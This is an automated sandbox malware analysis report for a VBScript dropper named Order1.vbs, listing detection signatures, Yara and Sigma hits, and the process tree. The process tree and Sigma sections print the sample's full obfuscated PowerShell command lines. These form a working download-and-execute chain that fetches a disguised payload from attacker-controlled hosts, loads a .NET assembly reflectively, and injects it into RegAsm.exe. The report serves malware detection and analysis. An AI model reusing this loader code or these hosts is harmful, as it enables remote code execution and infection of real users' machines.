Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order1.vbs

Overview

General Information

Sample name:Order1.vbs
Analysis ID:1612365
MD5:b9af88a3336a71464d6d5eebd10a249e
SHA1:8af081c2e08c73ef799cc68edf9789063c92f094
SHA256:4221dadd525a6ee6e72c757b3983dfab4bdedc912ee3aed8c451d316ca8b3d18
Tags:vbsuser-abuse_ch
Infos:

Detection

Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected Powershell download and execute
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 7616 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order1.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBD@G8@bgB2@GU@cgB0@F0@Og@6@EY@cgBv@G0@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@GI@YQBz@GU@Ng@0@EM@bwBt@G0@YQBu@GQ@KQ@7@C@@I@@g@CQ@d@Bl@Hg@d@@g@D0@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@7@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FI@ZQBm@Gw@ZQBj@HQ@aQBv@G4@LgBB@HM@cwBl@G0@YgBs@Hk@XQ@6@Do@T@Bv@GE@Z@@o@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@KQ@7@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@PQ@g@Ec@ZQB0@C0@QwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@C0@YgB5@HQ@ZQBB@HI@cgBh@Hk@I@@k@GU@bgBj@FQ@ZQB4@HQ@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@d@B5@H@@ZQ@g@D0@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@u@Ec@ZQB0@FQ@eQBw@GU@K@@n@HQ@ZQBz@HQ@c@Bv@Hc@ZQBy@HM@a@Bl@Gw@b@@u@Eg@bwBh@GE@YQBh@GE@YQBz@GQ@bQBl@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@bQBl@HQ@a@Bv@GQ@I@@9@C@@J@B0@Hk@c@Bl@C4@RwBl@HQ@TQBl@HQ@a@Bv@GQ@K@@n@Gw@ZgBz@Gc@ZQBk@GQ@Z@Bk@GQ@Z@Bk@GE@Jw@p@C4@SQBu@HY@bwBr@GU@K@@k@G4@dQBs@Gw@L@@g@Fs@bwBi@Go@ZQBj@HQ@WwBd@F0@I@@o@Cc@d@B4@HQ@LgBk@GU@RgBn@Ek@ZQBp@C8@bgBp@GE@bQ@v@HM@Z@Bh@GU@a@@v@HM@ZgBl@HI@LwB3@GU@bgBh@HI@YQBr@C8@Mw@x@DI@ZQBp@Gg@YwBp@HI@LwBt@G8@Yw@u@HQ@bgBl@HQ@bgBv@GM@cgBl@HM@dQBi@HU@a@B0@Gk@Zw@u@Hc@YQBy@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7712 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7844 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
        • RegAsm.exe (PID: 1432 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.2600719194.0000000003F91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
    00000007.00000002.2615795647.00000000054A0000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000007.00000002.2586589024.0000000003023000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Process Memory Space: powershell.exe PID: 7704JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
          Process Memory Space: powershell.exe PID: 7704INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
          • 0xa2aad:$b2: ::FromBase64String(
          • 0xef14a:$b2: ::FromBase64String(
          • 0xa2880:$b3: ::UTF8.GetString(
          • 0xeef1d:$b3: ::UTF8.GetString(
          • 0x15506d:$s1: -join
          • 0x15ece5:$s1: -join
          • 0x22fd2:$s3: reverse
          • 0x232c0:$s3: reverse
          • 0x239da:$s3: reverse
          • 0x24193:$s3: reverse
          • 0x2b32e:$s3: reverse
          • 0x2b748:$s3: reverse
          • 0x2c2d0:$s3: reverse
          • 0x2cf7d:$s3: reverse
          • 0x4eeb2:$s3: reverse
          • 0x5a7ac:$s3: reverse
          • 0x7da35:$s3: reverse
          • 0x84674:$s3: reverse
          • 0x866be:$s3: reverse
          • 0x916ed:$s3: reverse
          • 0xf4821:$s3: reverse
          Click to see the 4 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          7.2.RegAsm.exe.3f95570.6.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
            7.2.RegAsm.exe.54a0000.9.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_7844.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                Sigma Signatures

                Spreading

                barindex
                Sigma detected: Powershell download payload from hardcoded c2 list
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.deFgIei/niam/sdaeh/sfer/wenarak/312eihcir/moc.tnetnocresubuhtig.war//:s', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ccccccccccccnmfg/gvdfhd/downloads/test.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base

                System Summary

                barindex
                Sigma detected: Base64 Encoded PowerShell Command Detected
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GM@YwBj@GM@YwBj@GM@YwBj@GM@YwBj@G4@bQBm@Gc@LwBn@HY@Z@Bm@Gg@Z@@v@GQ@bwB3@G4@b@Bv@GE@Z@Bz@C8@d@Bl@HM@d@@u@Go@c@Bn@D8@MQ@z@Dc@MQ@x@DM@Jw@s@C@@JwBo@HQ@d@Bw@HM@Og@v@C8@bwBm@Gk@YwBl@DM@Ng@1@C4@ZwBp@HQ@a@B1@GI@LgBp@G8@Lw@x@C8@d@Bl@HM@d@@u@Go@c@Bn@Cc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@D0@I@BE@G8@dwBu@Gw@bwBh@GQ@R@Bh@HQ@YQBG@HI@bwBt@Ew@aQBu@Gs@cw@g@CQ@b@Bp@G4@awBz@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@t@G4@ZQ@g@CQ@bgB1@Gw@b@@p@C@@ew@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@FQ@ZQB4@HQ@LgBF@G4@YwBv@GQ@aQBu@Gc@XQ@6@Do@VQBU@EY@O@@u@Ec@ZQB0@FM@d@By@Gk@bgBn@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@UwBU@EE@UgBU@D4@Pg@n@Ds@I@@k@GU@bgBk@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBF@E4@R@@+@D4@Jw@7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@p@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@LQBn@GU@I@@w@C@@LQBh@G4@Z@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQBn@HQ@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@KQ@g@Hs@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@r@D0@I@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@C4@T@Bl@G4@ZwB0@Gg@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I
                Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@K